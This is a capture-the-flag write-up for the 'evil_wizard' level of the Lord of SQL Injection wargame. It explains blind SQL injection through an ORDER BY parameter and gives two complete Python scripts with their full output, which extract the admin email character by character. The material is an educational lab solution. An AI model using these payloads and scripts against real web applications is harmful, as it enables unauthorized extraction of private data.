evil_wizard

We are provided with the SQL queries:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY {$_GET[order]}

SELECT email FROM prob_hell_fire WHERE id='admin' AND email='{$_GET[email]}'`

The challenge returns the output in the form of a table.

If we provide the following URI parameter:

?order=id

The resultant query becomes:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY id

As we can see there are two users: admin and rubiya. Unlike hell_fire, in this challenge the users are sorted in the same way regardless if we order by id or score.

We can solve this using two different methods:

• Assigning different sort value
• Sorting by ASC or DESC

Blind SQL Injection - (Assigning different sort value)

Retrieving the email length

If we provide the following URI parameter:

?order=if(id='admin' AND length(email)=[length], 1, 2)

The resultant query becomes:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY if(id='admin' AND length(email)=[length], 1, 2)

Rows where the length of email for id='admin' is equal to the [length] that we provide, will be given the sort value 1. All other rows will be given the sort value 2. Rows with a lower sort value will appear first within the table.

So, if the admin user appears first, we know that the [length] was correct.

Leaking the email

If we provide the following URI parameter:

?order=if(id='admin' AND substr(email, 1, 1)='0', 1, 2)

The resultant query becomes:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY if(id='admin' AND substr(email, [index], 1)='[character]', 1, 2)

Rows where the id='admin' and character of the email at [index] is the same as the [character] that we provide, will be given the sort value 1. All other rows will be given sort value 2. Rows with a lower sort value will appear first within the table.

So, if the admin user appears first, we know that the [character] at [index] was correct.

Script

evil_wizard_script.py

import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'fgpbvjdctvq3qasns4lba8a85p'}
url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
email_length = 0

for x in range(0, 100):
  payload = f"if(id='admin' and length(email)={x}, 1, 2)"
  encoded_payload = urllib.parse.quote_plus(payload)
  full_url = f"{url}?order={encoded_payload}"
    
  response = requests.get(full_url, cookies=cookies)
    
  if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td>" in response.text:
    email_length = x
    break

print()    
print(f"[!] Payload: ?order={payload}")
print(f"[!] Payload (URL encoded): ?order={encoded_payload}")
print(f"[!] Email length: {email_length}")

email = ""
searchspace = '_@.' +  string.digits + string.ascii_letters

for index in range(1, email_length + 1):
  for char in searchspace:
    payload = f"if(id='admin' AND ord(substr(email, {index}, 1))='{ord(char)}', 1, 2)"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f"{url}?order={encoded_payload}"

    response = requests.get(full_url, cookies=cookies)

    if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td>" in response.text:
      email += char
      print()
      print(f"[+] Payload: ?order={payload}")
      print(f"[+] Payload (URL encoded): ?order={encoded_payload}")
      print(f"[+] Character at index {index}: {char}")
      break

print()
print(f"[!] Extracted email: {email}")
print(f"[!] Final payload: ?email={email}")

$ python .\evil_wizard_script.py

[!] Payload: ?order=if(id='admin' and length(email)=30, 1, 2)
[!] Payload (URL encoded): ?order=if%28id%3D%27admin%27+and+length%28email%29%3D30%2C+1%2C+2%29
[!] Email length: 30

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 1, 1))='97', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+1%2C+1%29%29%3D%2797%27%2C+1%2C+2%29
[+] Character at index 1: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 2, 1))='97', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+2%2C+1%29%29%3D%2797%27%2C+1%2C+2%29
[+] Character at index 2: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 3, 1))='115', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+3%2C+1%29%29%3D%27115%27%2C+1%2C+2%29
[+] Character at index 3: s

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 4, 1))='117', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+4%2C+1%29%29%3D%27117%27%2C+1%2C+2%29
[+] Character at index 4: u

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 5, 1))='112', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+5%2C+1%29%29%3D%27112%27%2C+1%2C+2%29
[+] Character at index 5: p

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 6, 1))='51', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+6%2C+1%29%29%3D%2751%27%2C+1%2C+2%29
[+] Character at index 6: 3

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 7, 1))='114', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+7%2C+1%29%29%3D%27114%27%2C+1%2C+2%29
[+] Character at index 7: r

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 8, 1))='95', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+8%2C+1%29%29%3D%2795%27%2C+1%2C+2%29
[+] Character at index 8: _

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 9, 1))='115', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+9%2C+1%29%29%3D%27115%27%2C+1%2C+2%29
[+] Character at index 9: s

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 10, 1))='101', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+10%2C+1%29%29%3D%27101%27%2C+1%2C+2%29
[+] Character at index 10: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 11, 1))='99', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+11%2C+1%29%29%3D%2799%27%2C+1%2C+2%29
[+] Character at index 11: c

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 12, 1))='117', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+12%2C+1%29%29%3D%27117%27%2C+1%2C+2%29
[+] Character at index 12: u

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 13, 1))='114', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+13%2C+1%29%29%3D%27114%27%2C+1%2C+2%29
[+] Character at index 13: r

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 14, 1))='101', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+14%2C+1%29%29%3D%27101%27%2C+1%2C+2%29
[+] Character at index 14: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 15, 1))='95', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+15%2C+1%29%29%3D%2795%27%2C+1%2C+2%29
[+] Character at index 15: _

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 16, 1))='101', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+16%2C+1%29%29%3D%27101%27%2C+1%2C+2%29
[+] Character at index 16: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 17, 1))='109', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+17%2C+1%29%29%3D%27109%27%2C+1%2C+2%29
[+] Character at index 17: m

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 18, 1))='97', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+18%2C+1%29%29%3D%2797%27%2C+1%2C+2%29
[+] Character at index 18: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 19, 1))='105', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+19%2C+1%29%29%3D%27105%27%2C+1%2C+2%29
[+] Character at index 19: i

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 20, 1))='108', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+20%2C+1%29%29%3D%27108%27%2C+1%2C+2%29
[+] Character at index 20: l

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 21, 1))='64', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+21%2C+1%29%29%3D%2764%27%2C+1%2C+2%29
[+] Character at index 21: @

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 22, 1))='101', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+22%2C+1%29%29%3D%27101%27%2C+1%2C+2%29
[+] Character at index 22: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 23, 1))='109', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+23%2C+1%29%29%3D%27109%27%2C+1%2C+2%29
[+] Character at index 23: m

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 24, 1))='97', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+24%2C+1%29%29%3D%2797%27%2C+1%2C+2%29
[+] Character at index 24: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 25, 1))='105', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+25%2C+1%29%29%3D%27105%27%2C+1%2C+2%29
[+] Character at index 25: i

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 26, 1))='49', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+26%2C+1%29%29%3D%2749%27%2C+1%2C+2%29
[+] Character at index 26: 1

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 27, 1))='46', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+27%2C+1%29%29%3D%2746%27%2C+1%2C+2%29
[+] Character at index 27: .

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 28, 1))='99', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+28%2C+1%29%29%3D%2799%27%2C+1%2C+2%29
[+] Character at index 28: c

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 29, 1))='111', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+29%2C+1%29%29%3D%27111%27%2C+1%2C+2%29
[+] Character at index 29: o

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 30, 1))='109', 1, 2)
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+30%2C+1%29%29%3D%27109%27%2C+1%2C+2%29
[+] Character at index 30: m

[!] Extracted email: aasup3r_secure_email@emai1.com
[!] Final payload: ?email=aasup3r_secure_email@emai1.com

Blind SQL Injection - (Sorting by ASC or DESC)

Retrieving the email length

If we provide the following URI parameter:

?order=if(id='admin' AND length(email)=[length], '1 ASC', '1 DESC')

The resultant query becomes:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY if(id='admin' AND length(email)=[length], '1 ASC', '1 DESC')

If the length of email for id='admin' is equal to the [length] that we provide, the rows will be sorted in ascending order. Otherwise, the rows will be sorted in descending order.

So, if the admin user appears first, we know that the [length] was correct.

Leaking the email

If we provide the following URI parameter:

?order=if(id='admin' AND substr(email, 1, 1)='0', '1 ASC', '1 DESC')

The resultant query becomes:

SELECT id,email,score FROM prob_hell_fire WHERE 1 ORDER BY if(id='admin' AND ord(substr(email, [index], 1))='ord([character])', '1 ASC', '1 DESC')

If the id='admin' and character of the email at [index] is the same as the [character] that we provide, the rows will be sorted in ascending order. Otherwise, the rows will be sorted in descending order.

So, if the admin user appears first, we know that the [character] at [index] was correct.

Script

evil_wizard_script.py

import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'josojaca8vb3q57avmhb3ltni3'}
url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
email_length = 0

for x in range(0, 100):
  payload = f"if(id='admin' and length(email)={x}, '1 ASC', '1 DESC')"
  encoded_payload = urllib.parse.quote_plus(payload)
  full_url = f"{url}?order={encoded_payload}"
    
  response = requests.get(full_url, cookies=cookies)
    
  if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td>" in response.text:
    email_length = x
    break

print()    
print(f"[!] Payload: ?order={payload}")
print(f"[!] Payload (URL encoded): ?order={encoded_payload}")
print(f"[!] Email length: {email_length}")

email = ""
searchspace = '_@.' +  string.digits + string.ascii_letters

print(searchspace)

for index in range(1, email_length + 1):
  for char in searchspace:
    payload = f"if(id='admin' AND ord(substr(email, {index}, 1))='{ord(char)}', '1 ASC', '1 DESC')"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f"{url}?order={encoded_payload}"

    response = requests.get(full_url, cookies=cookies)

    if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td>" in response.text:
      email += char
      print()
      print(f"[+] Payload: ?order={payload}")
      print(f"[+] Payload (URL encoded): ?order={encoded_payload}")
      print(f"[+] Character at index {index}: {char}")
      break

print()
print(f"[!] Extracted email: {email}")
print(f"[!] Final payload: ?email={email}")

python .\evil_wizard_script.py

[!] Payload: ?order=if(id='admin' and length(email)=30, '1 ASC', '1 DESC')
[!] Payload (URL encoded): ?order=if%28id%3D%27admin%27+and+length%28email%29%3D30%2C+%271+ASC%27%2C+%271+DESC%27%29
[!] Email length: 30

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 1, 1))='97', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+1%2C+1%29%29%3D%2797%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 1: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 2, 1))='97', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+2%2C+1%29%29%3D%2797%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 2: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 3, 1))='115', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+3%2C+1%29%29%3D%27115%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 3: s

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 4, 1))='117', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+4%2C+1%29%29%3D%27117%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 4: u

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 5, 1))='112', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+5%2C+1%29%29%3D%27112%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 5: p

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 6, 1))='51', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+6%2C+1%29%29%3D%2751%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 6: 3

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 7, 1))='114', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+7%2C+1%29%29%3D%27114%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 7: r

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 8, 1))='95', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+8%2C+1%29%29%3D%2795%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 8: _

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 9, 1))='115', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+9%2C+1%29%29%3D%27115%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 9: s

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 10, 1))='101', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+10%2C+1%29%29%3D%27101%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 10: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 11, 1))='99', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+11%2C+1%29%29%3D%2799%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 11: c

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 12, 1))='117', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+12%2C+1%29%29%3D%27117%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 12: u

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 13, 1))='114', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+13%2C+1%29%29%3D%27114%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 13: r

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 14, 1))='101', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+14%2C+1%29%29%3D%27101%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 14: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 15, 1))='95', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+15%2C+1%29%29%3D%2795%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 15: _

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 16, 1))='101', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+16%2C+1%29%29%3D%27101%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 16: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 17, 1))='109', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+17%2C+1%29%29%3D%27109%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 17: m

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 18, 1))='97', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+18%2C+1%29%29%3D%2797%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 18: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 19, 1))='105', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+19%2C+1%29%29%3D%27105%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 19: i

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 20, 1))='108', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+20%2C+1%29%29%3D%27108%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 20: l

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 21, 1))='64', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+21%2C+1%29%29%3D%2764%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 21: @

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 22, 1))='101', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+22%2C+1%29%29%3D%27101%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 22: e

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 23, 1))='109', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+23%2C+1%29%29%3D%27109%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 23: m

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 24, 1))='97', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+24%2C+1%29%29%3D%2797%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 24: a

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 25, 1))='105', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+25%2C+1%29%29%3D%27105%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 25: i

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 26, 1))='49', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+26%2C+1%29%29%3D%2749%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 26: 1

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 27, 1))='46', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+27%2C+1%29%29%3D%2746%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 27: .

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 28, 1))='99', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+28%2C+1%29%29%3D%2799%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 28: c

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 29, 1))='111', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+29%2C+1%29%29%3D%27111%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 29: o

[+] Payload: ?order=if(id='admin' AND ord(substr(email, 30, 1))='109', '1 ASC', '1 DESC')
[+] Payload (URL encoded): ?order=if%28id%3D%27admin%27+AND+ord%28substr%28email%2C+30%2C+1%29%29%3D%27109%27%2C+%271+ASC%27%2C+%271+DESC%27%29
[+] Character at index 30: m

[!] Extracted email: aasup3r_secure_email@emai1.com
[!] Final payload: ?email=aasup3r_secure_email@emai1.com